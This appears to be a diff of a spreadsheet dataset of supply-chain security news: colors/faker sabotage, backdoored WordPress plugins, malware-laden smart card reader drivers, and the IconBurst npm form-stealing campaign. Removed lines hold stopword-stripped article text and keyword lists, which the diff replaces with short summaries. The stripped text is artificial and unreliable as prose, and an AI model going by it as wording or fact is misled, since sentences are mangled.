'material', 'site', 'cached', 'permission', 'choice']</t>
         </is>
       </c>
     </row>
@@ -5143,17 +4425,12 @@
       </c>
       <c r="C181" t="inlineStr">
         <is>
-          <t>need enable javascript products products snyk code sast secure code written snyk open source avoid vulnerable dependencies snyk container keep base images secure snyk infrastructure code misconfigurations cloud snyk apprisk aspm reduce risk across business solutions application build secure stay secure software supply chain mitigate supply chain risk secure aigenerated code writes snyk secures zeroday vulnerabilities first snyk platform snyk developerfirst action developer platform modern single platform intelligence comprehensive vulnerability data license compliance management manage open source usage snyk learn selfservice education deepcode purposebuilt integrations snyk tools flows resources using snyk documentation vulnerability intelligence product training support services customer resources learn connect blog community events webinars devsecops developer resources company snyk customers partners newsroom contact careers pricing english deutsch français português sign book live demo snyk blog open source maintainer pulls plug packages colors faker written liran assaf josef january mins read january open source maintainer wildly popular package colors published colors141 colors1444liberty2 intentionally introduced offending commit adds infinite loop source code infinite loop triggered executed immediately upon initialization package’s source code would result denial service nodejs server using tldr snyk issued denial service vulnerability colors141 following vulnerable code highly recommend revert colors140 dependencies’ versions avoid blind upgrades offending version also recommend migrate different package continue reading information scope impact recommended countermeasures colors colors open source package receives million downloads week ecosystem project javascript nodejs developers powering great projects github records show colors project used within million projects npmjsorg shows package dependent upon packages following handful projects depend upon colors prompt commandline helper weekly downloads unicode table formatting clitable3 million weekly downloads aws’s awscdk million weekly downloads fact broken colors141 version impacts large amount users taken lightly according package page statistics npmjs learn version downloaded times time writing blog post breaking code following offending code introduced vulnerable colors library infinity consolelogtestingzalgorainbow console testing testing testing testing testing testing testing zalgo infinite loop code located indexjs file package’s source code break usage package printing unsettling zalgo text terminal dependent colors package mitigate currently impacted colors incident using broken version recommend revert back latest knowngood colors140 version doesn’t include offending infinite loop code example stable safe version colors package packagejson file replace following colors colors future reference recommend following best practices taken managing open source libraries projects dependencies either packagejson using lockfile help avoid installtime resolutions newer versions would’ve exposed install patched version colors introduced issue incident prompt consider moving alternative color handling package chalk review maintenance sustainability aspects open source packages intending ensure proper governance model multiple contributors fakerjs maintainer story event follows similar incident related popular package faker known broadly fakerjs maintained person faker project used many developers generative massive amounts fake data commonly used software testing practices faker receives million weekly downloads also quite popular dependency javascript nodejs projects however january open source repository github package received forced commit completely reverted package’s original source code respectively faker package version promoted published public npmjs registry empty package contains source code maintainer created issue stating longer maintain package free author later removed github repository sourcing project likely causing large disruption thousands developers using package potentially seeking migration paths later published article regarding matter personal blog fleshing failed attempts getting project monetized sponsored expressing current state donations unsustainable like people depend bills maintainer takes part packages well story dangers open source governance funding models event follows general trend open source community regarding liability companies organizations depend open source code production build products following release offending code colors maintainer also opened github issue discussing matter generally joke able find cause “bug” time handle marak continues tagging highly prolific nodejs developers help matter none real access project repository incidents fall line recent trend discussion open source community open source maintainers expressing dissatisfaction corporations organizations monetizing using open source software products responding open source criticism postlog4shell recently addressed maintainers hardships sustaining healthy open source software without funding observe continuing trend maintainers completely blocking access packages sentiment definitely understandable arguments valid noted approach blocking access open source packages also result hurting open source developers maintainers adopting open source best practices using open source software means need properly assess risks incidents legal issues well prepared handle unfold even better adopt best practices avoid mitigate potential supply chain issues recommend following practices reading content better position future situations like review maintenance sustainability status open source projects snyk advisor tool helps gauge packages health score best practices mentions importance enabling twofactor authentication pinning dependencies proper lockfile usage others read securing modern software supply chain topics like dependency confusion typosquatting malicious packages practical advice snyk helps preventing malicious packages supply chain attacks live hack exploiting aigenerated code gain insights best practices utilizing generative coding tools securely upcoming live hacking session register posted vulnerability insights open source state open source report snyk analyzed responses organizations anonymized data collected snyk product usage shed light current posture software trends report snyk developer platform integrating directly development tools workflows automation pipelines snyk makes easy teams find prioritize vulnerabilities code dependencies containers infrastructure code supported industryleading application intelligence snyk puts expertise developer’s toolkit start free book live demo product snyk snyk code sast snyk open source snyk container snyk infrastructure code snyk apprisk aspm developer platform application software supply chain secure aigenerated code deepcode pricing deployment options integrations plugins cicd pipelines snyk snyk learn snyk javascript resources documentation snyk docs status disclosed vulnerabilities support portal faq’s blog fundamentals resources leaders resources ethical hackers vulnerability database snyk advisor snyk videos customer resources company customers careers events snyk government press trust legal terms privacy california residents sell personal information website terms connect book live demo contact support report vuln application container supply chain javascript open source secure sdlc posture secure coding ethical hacking cybersecurity code checker python enterprise cybersecurity javascript snyk github snyk veracode snyk limited registered england wales</t>
+          <t>The open source maintainer of the popular npm package colors, intentionally introduced an offending commit that adds an infinite loop to the source code.</t>
         </is>
       </c>
       <c r="D181" t="inlineStr">
         <is>
           <t>https://snyk.io/blog/open-source-npm-packages-colors-faker/</t>
-        </is>
-      </c>
-      <c r="E181" t="inlineStr">
-        <is>
-          <t>['javascript', 'product', 'product', 'snyk', 'code', 'sast', 'secure', 'code', 'snyk', 'open', 'source', 'vulnerable', 'dependency', 'snyk', 'container', 'base', 'image', 'secure', 'snyk', 'infrastructure', 'code', 'misconfiguration', 'risk', 'business', 'solution', 'application', 'secure', 'secure', 'software', 'supply', 'chain', 'supply', 'chain', 'risk', 'secure', 'code', 'snyk', 'zeroday', 'first', 'snyk', 'platform', 'action', 'developer', 'platform', 'modern', 'single', 'platform', 'intelligence', 'comprehensive', 'vulnerability', 'license', 'compliance', 'management', 'open', 'source', 'usage', 'snyk', 'selfservice', 'education', 'purposebuilt', 'integration', 'snyk', 'tool', 'resource', 'snyk', 'documentation', 'vulnerability', 'intelligence', 'product', 'training', 'support', 'service', 'customer', 'resource', 'blog', 'community', 'event', 'webinar', 'developer', 'resource', 'company', 'snyk', 'customer', 'partner', 'newsroom', 'contact', 'career', 'book', 'live', 'demo', 'snyk', 'blog', 'open', 'source', 'maintainer', 'plug', 'package', 'color', 'min', 'open', 'source', 'popular', 'package', 'color', 'colors141', 'commit', 'infinite', 'loop', 'source', 'code', 'infinite', 'loop', 'initialization', 'package', 'source', 'code', 'denial', 'service', 'nodejs', 'server', 'denial', 'service', 'vulnerability', 'vulnerable', 'code', 'colors140', 'dependency', 'version', 'blind', 'upgrade', 'version', 'different', 'package', 'information', 'scope', 'impact', 'countermeasure', 'color', 'color', 'open', 'source', 'package', 'download', 'week', 'ecosystem', 'project', 'javascript', 'nodejs', 'developer', 'great', 'project', 'record', 'color', 'project', 'project', 'package', 'dependent', 'package', 'handful', 'project', 'color', 'prompt', 'commandline', 'helper', 'weekly', 'download', 'unicode', 'table', 'weekly', 'download', 'weekly', 'download', 'fact', 'version', 'large', 'amount', 'user', 'package', 'page', 'statistic', 'version', 'time', 'time', 'blog', 'post', 'code', 'code', 'vulnerable', 'color', 'console', 'testing', 'testing', 'testing', 'testing', 'testing', 'testing', 'code', 'indexjs', 'file', 'package', 'source', 'code', 'break', 'usage', 'package', 'unsettling', 'terminal', 'dependent', 'color', 'package', 'color', 'incident', 'version', 'revert', 'late', 'knowngood', 'colors140', 'version', 'infinite', 'loop', 'code', 'example', 'stable', 'safe', 'version', 'color', 'package', 'packagejson', 'file', 'replace', 'color', 'future', 'reference', 'good', 'practice', 'open', 'source', 'library', 'dependency', 'packagejson', 'lockfile', 'help', 'installtime', 'resolution', 'new', 'version', 'install', 'patched', 'version', 'color', 'issue', 'incident', 'prompt', 'alternative', 'color', 'handling', 'package', 'chalk', 'review', 'maintenance', 'sustainability', 'aspect', 'open', 'source', 'package', 'proper', 'governance', 'model', 'multiple', 'contributor', 'story', 'event', 'similar', 'incident', 'popular', 'package', 'faker', 'person', 'faker', 'project', 'many', 'developer', 'massive', 'amount', 'fake', 'datum', 'software', 'testing', 'practice', 'faker', 'weekly', 'download', 'popular', 'dependency', 'javascript', 'nodejs', 'project', 'open', 'repository', 'commit', 'package', 'original', 'source', 'code', 'faker', 'package', 'version', 'public', 'npmjs', 'registry', 'empty', 'package', 'source', 'code', 'maintainer', 'issue', 'package', 'free', 'author', 'project', 'large', 'disruption', 'thousand', 'developer', 'package', 'migration', 'path', 'article', 'matter', 'personal', 'blog', 'attempt', 'project', 'current', 'state', 'donation', 'unsustainable', 'people', 'bill', 'part', 'package', 'story', 'danger', 'open', 'source', 'governance', 'funding', 'model', 'event', 'general', 'trend', 'open', 'source', 'community', 'liability', 'company', 'organization', 'open', 'source', 'code', 'production', 'build', 'product', 'release', 'code', 'color', 'issue', 'matter', 'joke', 'able', 'cause', 'bug', 'time', 'prolific', 'nodejs', 'developer', 'none', 'real', 'access', 'project', 'repository', 'incident', 'line', 'recent', 'trend', 'discussion', 'open', 'source', 'community', 'open', 'source', 'dissatisfaction', 'corporation', 'organization', 'open', 'source', 'software', 'product', 'open', 'source', 'criticism', 'postlog4shell', 'hardship', 'healthy', 'open', 'source', 'software', 'trend', 'access', 'package', 'sentiment', 'understandable', 'argument', 'valid', 'approach', 'access', 'open', 'source', 'package', 'open', 'source', 'developer', 'open', 'source', 'good', 'practice', 'open', 'source', 'software', 'mean', 'risk', 'legal', 'issue', 'handle', 'good', 'practice', 'potential', 'supply', 'chain', 'issue', 'practice', 'content', 'well', 'position', 'future', 'situation', 'review', 'maintenance', 'sustainability', 'status', 'open', 'source', 'project', 'snyk', 'advisor', 'tool', 'package', 'health', 'score', 'good', 'practice', 'importance', 'twofactor', 'authentication', 'dependency', 'proper', 'lockfile', 'usage', 'other', 'modern', 'software', 'supply', 'chain', 'topic', 'dependency', 'confusion', 'malicious', 'package', 'practical', 'advice', 'snyk', 'malicious', 'package', 'supply', 'chain', 'attack', 'hack', 'code', 'insight', 'good', 'practice', 'generative', 'tool', 'upcoming', 'live', 'hacking', 'session', 'vulnerability', 'insight', 'open', 'source', 'state', 'open', 'source', 'report', 'snyk', 'response', 'organization', 'datum', 'snyk', 'product', 'usage', 'light', 'current', 'posture', 'software', 'trend', 'snyk', 'developer', 'platform', 'development', 'tool', 'automation', 'pipeline', 'snyk', 'easy', 'team', 'prioritize', 'vulnerability', 'code', 'dependency', 'container', 'application', 'intelligence', 'snyk', 'expertise', 'developer', 'toolkit', 'free', 'book', 'live', 'demo', 'product', 'snyk', 'snyk', 'code', 'sast', 'snyk', 'open', 'source', 'snyk', 'container', 'developer', 'platform', 'application', 'software', 'supply', 'chain', 'code', 'pricing', 'deployment', 'option', 'integration', 'pipeline', 'snyk', 'snyk', 'javascript', 'resource', 'documentation', 'snyk', 'status', 'vulnerability', 'blog', 'resource', 'leader', 'ethical', 'hacker', 'vulnerability', 'advisor', 'customer', 'resource', 'company', 'customer', 'career', 'event', 'snyk', 'government', 'press', 'trust', 'legal', 'term', 'resident', 'personal', 'information', 'website', 'term', 'book', 'live', 'demo', 'contact', 'support', 'report', 'application', 'container', 'supply', 'chain', 'javascript', 'open', 'source', 'secure', 'sdlc', 'posture', 'secure', 'ethical', 'hacking', 'cybersecurity', 'code', 'python', 'enterprise', 'cybersecurity']</t>
         </is>
       </c>
     </row>
@@ -5168,15 +4445,14 @@
           <t>WordPress</t>
         </is>
       </c>
-      <c r="C182" t="inlineStr"/>
+      <c r="C182" t="inlineStr">
+        <is>
+          <t>A massive supply chain attack compromised 93 WordPress themes and plugins to contain a backdoor, giving threat-actors full access to websites.</t>
+        </is>
+      </c>
       <c r="D182" t="inlineStr">
         <is>
           <t>https://www.bleepingcomputer.com/news/security/over-90-wordpress-themes-plugins-backdoored-in-supply-chain-attack/</t>
-        </is>
-      </c>
-      <c r="E182" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -5193,17 +4469,12 @@
       </c>
       <c r="C183" t="inlineStr">
         <is>
-          <t>advertisement advertisement skip content home author advertisingspeaking smart card reader comes malware comments millions government employees contractors issued secure smart card enables physical access buildings controlled spaces provides access government computer networks systems cardholder’s appropriate level many government employees aren’t issued approved card reader device lets cards home remotely turn lowcost readers find online could wrong here’s example sample common access card image cacmil krebsonsecurity recently heard reader we’ll call “mark” wasn’t authorized speak press works major government defense contractor issued personal identity verification government smart card designed civilian employees smart card reader home lacking obvious guidance coworkers mark opted purchase reader amazon said made handle government smart cards usbbased device mark settled first result currently comes searches amazoncom “piv card reader” card reader mark bought sold company called saicoo whose sponsored amazon listing advertises “dod military common access card reader” mostly positive ratings common access card standard identification active duty uniformed service personnel selected reserve civilian employees eligible contractor personnel principal card used enable physical access buildings controlled spaces provides access computer networks systems mark said received reader plugged windows operating system complained device’s hardware drivers weren’t functioning properly windows suggested consulting vendor’s website newer drivers saicoo smart card reader mark purchased image amazoncom mark went website mentioned saicoo’s packaging found file containing drivers linux windows image saicoo abundance caution mark submitted saicoo’s drivers file virustotalcom simultaneously scans shared files five dozen antivirus products virustotal reported different tools detected saicoo drivers malicious consensus seems file currently harbors malware known ramnit fairly common dangerous trojan horse spreads appending files image virustotalcom ramnit wellknown older first surfacing decade evolved years still employed sophisticated data exfiltration attacks amazon said written statement investigating reports “seems like potentially significant national risk considering many users might elevated clearance levels using cards secure access” mark said mark said contacted saicoo website serving malware received response saying company’s newest hardware require additional drivers said saicoo address concern driver package website bundled malware response krebsonsecurity’s request comment saicoo sent somewhat less reassuring reply “from details offered issue probably caused computer defense system seems recognized rarely used driver detected malicious virus” saicoo’s support team wrote email “actually it’s carrying virus trust reader hand please ignore continue installation steps” message continued “when driver installed message vanish sight don’t worry” saicoo’s response krebsonsecurity trouble saicoo’s apparently infected drivers little case technology company site hacked responding poorly dormann vulnerability analyst certcc wrote twitter executable files saicoo drivers file altered ramnit malware included html files dormann said it’s enough searching device drivers online riskiest activities undertake online “doing search drivers dangerous terms legitmalicious ratio search perform based results time i’ve tried dormann added “combine apparent diligence vendor outlined well ain’t pretty picture” accounts potential attack surface enormous many federal employees clearly purchase readers myriad online vendors need arises saicoo’s product listings example replete comments customers selfstate work federal agency several reported problems installing drivers thread mark’s experience twitter generated strong response followers many apparently work government capacity governmentissued cards things emerged clearly conversation first general confusion whether government sort list approved vendors general services administration agency handles procurement federal civilian agencies maintains list approved card reader vendors idmanagementgov saicoo list thanks metabiometrics shugenja link theme twitter discussion reality many people find buying offtheshelf readers expedient going gsa’s official procurement process whether it’s never issued reader using simply longer worked lost needed another quickly “almost every officer noncommissioned officer know reserve component reader bought email home they’ve never issued laptop reader” said david dixon army veteran author lives northern virginia “when boss tells check email home you’re national guard live hours nearest nonclassified military network installation think going happen” interestingly anyone asking twitter navigate purchasing right smart card reader getting work properly invariably steered toward militarycaccom website maintained michael danberry decorated retired army veteran launched site text linkheavy design much takes back internet webpages general site even officially recommended army mark shared emails showing saicoo recommends militarycaccom image militarycaccom “the army reserve started using logon 2006” danberry wrote “about” page became guy’ army reserve center minnesota thought stop could website knowledge share you” danberry respond requests interview doubt he’s busy tech support federal government friendly message danberry’s voicemail instructs supportneeding callers leave detailed information issue they’re cacpiv card readers dixon said danberry “done keep army running connected army chief information officers together” many ways danberry equivalent little known software developer whose tiny opensourced code project ends becoming widely adopted eventually folded fabric internet wonder ever imagined years website would become “critical infrastructure” uncle entry posted tuesday 17th little sunshine coming storm reader certcc david dixon michael danberry militarycaccom saicoo general services administration dormann post navigation investigating breach enforcement data portal senators urge probe idme selfie data thoughts smart card reader comes malware william iceberg uscis solarwinds machine slowing network much disconnect russians looking everything especially congressional email it’s wonder russians don’t cause nuke redneckindian worry reader tremble fear realize router made china unknown brand specifies it’s government broken english bobl quoting article many ways danberry equivalent little known software developer whose tiny opensourced code project ends becoming widely adopted eventually folded fabric internet wonder ever imagined years website would become “critical infrastructure” uncle sam” graphic interpretation seen httpsimgsxkcdcomcomicsdependencypng buying equipment involved risky deal organization provided user either qualified list equipmentproviders actual equipment along said list possible enduser procure another unit home especially work home scenario past years sean image spot absolute truth site bobl posted link instead httpsxkcdcom2347 it’s picture amazon full chinese garbage story doesn’t surprise least andrea dvorkin always rape sean militarycaccom really many ways critical infrastructure many ways danberry equivalent little known software developer whose tiny opensourced code project ends becoming widely adopted eventually folded fabric internet wonder ever imagined years website would become “critical infrastructure” uncle sam” honest don’t know anyone reserves site branch service speaking personal experience army national guard army reserve coast guard navy active duty xavier went onto amazon searched reader asked question approved government five people reply back within hours stating even though readers viewed approved also people replied stated work insert name agency made crazy people don’t phishing malwareanalyst anyone else actually looked actual malware involved stuff won’t even there’s realistic infection vector download company’s website e7c6ee042434f7c08712a8acfec49d790f969fa0608a0e16099d33b319b1f862 extracts whole folder legitimate installer file supporting documentation installer exes clean infected part html help files android application view source code html files you’ll vbscript file executed would drop ramnit year heavilysignatured trojan problem circumstances vbscript would executed it’s commented even user went install android encountered problem went open documentation malware still won’t install even user opens infected html file browser nevermind fact silly infection vector even code weren’t commented attacker serious spreading trojan could replaced setupexe autorunexe trojan case hardly sophisticated nationstate level attack people government cards jessica probably exploited idiotic vulnerability files probably originally rolled someone’s computer china running pirated copy winxp merrily propagated files point since bothered weird comments code they’re using wysiwyg editor don’t even thus remain files copiedreused templatesetc good looked jumping kind sidesteps point you’re begging question toward easily could legitimate effort given clumsiness apparent lack protocol common sense enduser case privileged secrets custodian duly employed national doubt wasn’t hack century wasn’t going unprepared hamfisted larger operational single recent public example nonsci public even come know it’s black outside inside single glimpse it’s obviously pretty dave indeed guess stands compartmentalized personal computers user would even allowed install anything alone drivers can’t stupid users best limit access “privileged secrets” network would accessible internet personal computers steve june saicoo reader worked without needing additional drivers windows used driver “microsoft usbccid smartcard reader wudf” curiosity link pacs readers supposedly approved list readers pacs door access reading cert comment navigation older comments comments closed advertisement advertisement mailing list subscribe search krebsonsecurity search recent posts recent ‘mfa bombing’ attacks targeting apple users mozilla drops onerep admits running peoplesearch networks notsotrue peoplesearch network china data privacy company onerepcom founded dozens peoplesearch firms patch tuesday march edition story categories little sunshine skimmers ashley madison breach breadcrumbs data breaches ddosforhire employment fraud break internet things latest warnings neerdowell news pharma wars ransomware russias ukraine tools swapping spam nation target small businesses refund fraud coming storm time patch fraud many hackers hail russia krebs mastodon</t>
+          <t>Virustotal reported that some 43 different security tools detected the Saicoo drivers as malicious. The consensus seems to be that the ZIP file currently harbors a malware threat known as Ramnit, a fairly common but dangerous trojan horse that spreads by appending itself to other files.</t>
         </is>
       </c>
       <c r="D183" t="inlineStr">
         <is>
           <t>https://krebsonsecurity.com/2022/05/when-your-smart-id-card-reader-comes-with-malware/</t>
-        </is>
-      </c>
-      <c r="E183" t="inlineStr">
-        <is>
-          <t>['advertisement', 'advertisement', 'home', 'author', 'smart', 'card', 'reader', 'comment', 'million', 'government', 'employee', 'contractor', 'secure', 'smart', 'card', 'physical', 'access', 'building', 'space', 'access', 'government', 'computer', 'network', 'system', 'cardholder', 'appropriate', 'level', 'many', 'government', 'employee', 'card', 'reader', 'device', 'card', 'lowcost', 'reader', 'example', 'sample', 'common', 'access', 'card', 'image', 'reader', 'mark', 'speak', 'press', 'major', 'government', 'defense', 'contractor', 'personal', 'identity', 'verification', 'government', 'smart', 'card', 'civilian', 'employee', 'smart', 'card', 'reader', 'home', 'obvious', 'guidance', 'coworker', 'purchase', 'reader', 'handle', 'government', 'smart', 'card', 'usbbased', 'device', 'mark', 'first', 'result', 'search', 'card', 'reader', 'card', 'company', 'saicoo', 'amazon', 'advertise', 'military', 'common', 'access', 'card', 'reader', 'positive', 'rating', 'common', 'access', 'card', 'standard', 'identification', 'active', 'duty', 'uniformed', 'service', 'personnel', 'civilian', 'employee', 'eligible', 'contractor', 'personnel', 'principal', 'card', 'enable', 'physical', 'access', 'building', 'space', 'access', 'computer', 'network', 'system', 'reader', 'window', 'operating', 'system', 'device', 'hardware', 'driver', 'window', 'vendor', 'website', 'new', 'driver', 'smart', 'card', 'reader', 'website', 'saicoo', 'packaging', 'file', 'driver', 'saicoo', 'caution', 'mark', 'saicoo', 'driver', 'file', 'virustotalcom', 'file', 'dozen', 'antivirus', 'product', 'virustotal', 'different', 'tool', 'saicoo', 'driver', 'malicious', 'consensus', 'file', 'common', 'dangerous', 'trojan', 'horse', 'file', 'image', 'virustotalcom', 'old', 'first', 'surfacing', 'decade', 'year', 'sophisticated', 'datum', 'exfiltration', 'attack', 'statement', 'report', 'significant', 'national', 'risk', 'many', 'user', 'clearance', 'level', 'card', 'access', 'mark', 'contacted', 'saicoo', 'website', 'malware', 'response', 'company', 'new', 'hardware', 'additional', 'driver', 'saicoo', 'address', 'concern', 'driver', 'package', 'website', 'krebsonsecurity', 'request', 'comment', 'saicoo', 'reassuring', 'reply', 'detail', 'issue', 'computer', 'defense', 'system', 'driver', 'malicious', 'virus', 'saicoo', 'support', 'team', 'email', 'virus', 'trust', 'reader', 'hand', 'installation', 'step', 'message', 'driver', 'message', 'vanish', 'sight', 'saicoo', 'response', 'krebsonsecurity', 'trouble', 'saicoo', 'driver', 'little', 'case', 'technology', 'company', 'site', 'vulnerability', 'twitter', 'executable', 'file', 'saicoo', 'driver', 'file', 'ramnit', 'device', 'driver', 'risky', 'activity', 'search', 'driver', 'dangerous', 'term', 'legitmalicious', 'ratio', 'search', 'perform', 'result', 'time', 'apparent', 'diligence', 'vendor', 'pretty', 'picture', 'potential', 'attack', 'surface', 'enormous', 'many', 'federal', 'employee', 'reader', 'myriad', 'online', 'vendor', 'saicoo', 'product', 'listing', 'replete', 'comment', 'customer', 'work', 'federal', 'agency', 'several', 'problem', 'driver', 'thread', 'experience', 'twitter', 'strong', 'response', 'follower', 'many', 'government', 'capacity', 'card', 'thing', 'conversation', 'first', 'general', 'confusion', 'government', 'sort', 'list', 'vendor', 'administration', 'agency', 'procurement', 'federal', 'civilian', 'agency', 'list', 'card', 'reader', 'idmanagementgov', 'saicoo', 'list', 'thank', 'theme', 'discussion', 'reality', 'many', 'people', 'reader', 'expedient', 'official', 'procurement', 'process', 'reader', 'officer', 'noncommissioned', 'officer', 'component', 'reader', 'email', 'laptop', 'reader', 'veteran', 'author', 'boss', 'email', 'national', 'guard', 'live', 'hour', 'nonclassified', 'military', 'network', 'installation', 'twitter', 'right', 'smart', 'card', 'reader', 'work', 'website', 'army', 'veteran', 'site', 'text', 'linkheavy', 'design', 'much', 'internet', 'webpage', 'general', 'site', 'army', 'mark', 'email', 'saicoo', 'army', 'reserve', 'logon', 'page', 'guy', 'thought', 'stop', 'knowledge', 'share', 'request', 'interview', 'doubt', 'busy', 'tech', 'support', 'federal', 'government', 'friendly', 'message', 'voicemail', 'instruct', 'caller', 'detailed', 'information', 'issue', 'cacpiv', 'card', 'reader', 'army', 'connected', 'army', 'chief', 'information', 'officer', 'many', 'way', 'equivalent', 'little', 'software', 'developer', 'tiny', 'opensourced', 'code', 'project', 'fabric', 'internet', 'wonder', 'year', 'website', 'critical', 'infrastructure', 'uncle', 'entry', '17th', 'little', 'sunshine', 'storm', 'navigation', 'breach', 'enforcement', 'datum', 'portal', 'senator', 'probe', 'idme', 'datum', 'thought', 'smart', 'card', 'reader', 'network', 'russian', 'congressional', 'email', 'wonder', 'russian', 'nuke', 'redneckindian', 'worry', 'reader', 'fear', 'router', 'unknown', 'government', 'article', 'many', 'way', 'equivalent', 'little', 'software', 'developer', 'tiny', 'opensourced', 'code', 'project', 'fabric', 'internet', 'wonder', 'year', 'website', 'critical', 'infrastructure', 'uncle', 'graphic', 'interpretation', 'buying', 'equipment', 'risky', 'deal', 'organization', 'user', 'qualified', 'list', 'actual', 'equipment', 'list', 'possible', 'procure', 'unit', 'scenario', 'year', 'sean', 'image', 'spot', 'absolute', 'truth', 'site', 'bobl', 'link', 'httpsxkcdcom2347', 'picture', 'amazon', 'full', 'chinese', 'garbage', 'story', 'many', 'way', 'critical', 'infrastructure', 'many', 'way', 'equivalent', 'little', 'software', 'developer', 'tiny', 'opensourced', 'code', 'project', 'fabric', 'internet', 'wonder', 'year', 'website', 'critical', 'infrastructure', 'uncle', 'honest', 'reserve', 'site', 'branch', 'service', 'personal', 'experience', 'active', 'duty', 'xavi', 'amazon', 'reader', 'question', 'government', 'people', 'hour', 'reader', 'people', 'work', 'insert', 'name', 'agency', 'crazy', 'people', 'malwareanalyst', 'actual', 'malware', 'stuff', 'realistic', 'infection', 'vector', 'download', 'company', 'website', 'e7c6ee042434f7c08712a8acfec49d790f969fa0608a0e16099d33b319b1f862', 'whole', 'folder', 'legitimate', 'installer', 'file', 'documentation', 'installer', 'ex', 'clean', 'part', 'html', 'file', 'android', 'application', 'view', 'source', 'code', 'html', 'file', 'file', 'year', 'problem', 'circumstance', 'user', 'problem', 'open', 'documentation', 'malware', 'user', 'infected', 'file', 'browser', 'nevermind', 'fact', 'silly', 'infection', 'vector', 'code', 'attacker', 'serious', 'trojan', 'case', 'sophisticated', 'nationstate', 'level', 'attack', 'people', 'government', 'card', 'idiotic', 'vulnerability', 'file', 'computer', 'copy', 'file', 'point', 'weird', 'comment', 'code', 'editor', 'file', 'templatesetc', 'good', 'kind', 'sidestep', 'point', 'question', 'legitimate', 'effort', 'clumsiness', 'apparent', 'lack', 'protocol', 'common', 'sense', 'case', 'privileged', 'secret', 'national', 'doubt', 'hack', 'century', 'unprepared', 'large', 'operational', 'single', 'recent', 'public', 'example', 'public', 'black', 'single', 'glimpse', 'pretty', 'stand', 'compartmentalized', 'personal', 'computer', 'user', 'alone', 'driver', 'stupid', 'user', 'access', 'privileged', 'secret', 'network', 'internet', 'personal', 'computer', 'saicoo', 'reader', 'additional', 'driver', 'window', 'driver', 'wudf', 'curiosity', 'link', 'pac', 'reader', 'list', 'reader', 'pac', 'door', 'access', 'cert', 'comment', 'navigation', 'old', 'comment', 'comment', 'advertisement', 'advertisement', 'mailing', 'list', 'search', 'krebsonsecurity', 'search', 'recent', 'post', 'recent', 'bombing', 'attack', 'apple', 'user', 'onerep', 'peoplesearch', 'network', 'company', 'onerepcom', 'dozen', 'firm', 'story', 'category', 'little', 'skimmer', 'breach', 'break', 'internet', 'thing', 'late', 'warning', 'news', 'pharma', 'war', 'ransomware', 'tool', 'nation', 'target', 'small', 'business', 'refund', 'fraud', 'storm', 'time', 'patch', 'fraud', 'many', 'hacker']</t>
         </is>
       </c>
     </row>
@@ -5220,17 +4491,12 @@
       </c>
       <c r="C184" t="inlineStr">
         <is>
-          <t>buyer’s guide software supply chain download sboms moment hear make actionable save spot gartner® report mitigate enterprise software supply chain risks insights solutions software supply chain spectra assure procurement spectra assure build release automate support triage incident response siemsoar protect cloud file shares optimize hunting ransomware feed malware hunting sandbox email intelligence platform intelligence platform microsoft sentinel product technology product technology titanium platform spectra assure software supply chain reversinglabs intelligence reversinglabs elastic infrastructure reversinglabs analysis hunting free open source yara rules integrations partners partners become partner value added partners marketplaces alliances reversinglabs synopsys resources resources blog content library webinars software deconstruction demo series reversingglass concepts explained conversinglabs podcast labs yara rules demo videos learning reversinglabs company company leadership careers series investment company news events events press press releases news demo contact support login blog developer portal search reversinglabs blog research july update iconburst software supply chain attack grabs data apps websites reversinglabs researchers uncovered widespread campaign install malicious modules harvesting sensitive data forms embedded mobile apps websites blog author karlo zanki reverse engineer reversinglabs read executive summary update since publication blog malicious packages attributable accounts identified original report appeared addition content distribution network infrastructure identified used script inclusion updated blog post include latest information continue updating threats information become available july reversinglabs researchers recently discovered evidence widespread software supply chain attack involving malicious javascript packages offered package manager researchers reversinglabs identified dozen packages dating back months contain obfuscated javascript designed steal form data individuals using applications websites malicious packages deployed upon closer inspection discovered evidence coordinated supply chain attack large number packages containing jquery scripts designed steal form data deployed applications include full extent attack isn’t known malicious packages discovered likely used hundreds thousands downstream mobile desktop applications well websites case malicious package downloaded times recent benign dependency confusion attacks targeting german organizations clearly malicious attacks relied typosquatting technique attackers offer packages public repositories names similar common misspellings legitimate packages attackers impersonated hightraffic modules like umbrellajs packages published ionicio however users software data rather development organizations real targets makes attack comparable infamous solarwinds compromise recent supply chain compromises furthermore similarities domains used exfiltrate data suggest various modules campaign control single actor here’s detailed information widespread software supply chain attack including known indicators compromise iocs associated attacks recommendations remediating posed malicious modules watch karlo zankis discussion iconburst research conversinglabs introduction reversinglabs research team continuously monitoring opensource package repositories instances malicious code planting software supply chain attacks work involves automated humanled scanning analysis packages published popular public package repositories like pypi ruby nuget scans leverage proprietary titanium platform deep file repository goodware badware spot malicious even suspicious elements hiding plain view newly released reversinglabs software supply chain platform builds upon past work platform provides teams deeply examine cicd workflows containers release packages spot nascent active software supply chain compromises frequently work turns evidence active software supply chain attacks april came across packages used javascript obfuscator hide functionality analysis packages produced proof simulated “dependency confusion” attacks software supply chain leading german companies across number industries tracking repositories occurrences packages obfuscator ever since here’s tracking usage obfuscation technique resulted discovering several accounts used publish malicious code designed steal form data entered users infected applications discussion core capability reversinglabs’ securesoftware solution analyzing code intent highlighting malicious behaviors indicators cover kinds software behavior network file system activities packers associated malicious campaigns evasion techniques obfuscation technique we’re increasingly attuned javascript obfuscator goodware component intended mostly protect javascript applications prying eyes seek steal reverse engineer code despite respectable bona fides javascript obfuscator laudable purpose past research revealed several instances malicious packages using tool disguise malicious code point every encounter behavior requires closer look presence javascript obfuscator indicator initially team looking wide range packages mostly published last months using mentioned obfuscator total discovered dozen packages looked names packages noticed striking similarities show mean check following list suspect packages figure similarly named packages using javascript obfuscator spot pattern deeper investigation modules reveals even connections connected handful accounts names like ionicio arpanrizki kbrstore aselole obfuscated code found stealing form data figure going packages team started deobfuscating package content using javascript deobfuscator followed detailed examination deobfuscated samples revealed perform collection form data using jquery ajax functions exfiltrate data various domains controlled malicious authors words clear evidence malicious intent clearly typosquatting technique used fool developers confusing malicious packages legitimate counterparts working packages created ionicio author example show author published versions package named iconpackage containing malicious form stealing code glaring attempt mislead developers using package instead ionicons popular opensource icon icons android desktop apps figure version data related iconpackage download stats show malicious iconpackage downloads data exfiltrated using package passes domain hxxpsioniciocom play legitimate ionicons framework domain ionicio would easy application developers overlook ruse extends beyond ecosystem though note visual similarity fake ionic page seen figure legitimate ionic page figure figure fake ionic webpage figure legitimate ionic webpage hood malicious packages modified script extends behavior jquery ajax function exfiltrate serialized form data domains controlled attacker prior sending data function validates content perform target filtering checks trail begins december process tracing origin campaign even older packages containing type malicious functionality discovered published 